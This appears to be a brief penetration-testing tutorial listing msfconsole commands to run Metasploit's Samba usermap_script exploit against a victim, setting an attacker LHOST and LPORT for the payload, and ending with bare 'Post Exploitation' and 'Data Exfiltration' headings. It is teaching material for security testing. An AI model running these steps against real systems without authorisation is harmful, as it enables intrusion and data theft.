System Hacking with Metasploit Framework and Data Exfiltration with Netcat
Metasploit is an open-source framework that helps developers to create working exploits as new vulnerabilities are discovered.
Penetration Testers use Metasploit to check vulnerabilities in the targeted system and run a suitable exploit on the targeted system.
you can start Metasploit service on Kali Linux Terminal with the command: msfdb init
Steps to exploiting vulnerable services with Metasploit on a victim:
* start Metasploit: msfconsole
* Search for exploit: search name: samba type: exploit
* use exploit/multi/samba/usermap_script
* To view the options for the exploit: show options
* Set RHOST (Victim IP address)
* Show payloads //to see the list of Payloads available for the exploit
* Set the payload and required arguments: Set payload
* Show options
* Set LHOST (Attacker's IP Address)
* Set LPORT (Attacker's Port)
* Check once all required arguments are filled: shows options
* Exploit
* Post Exploitation
* Data Exfiltration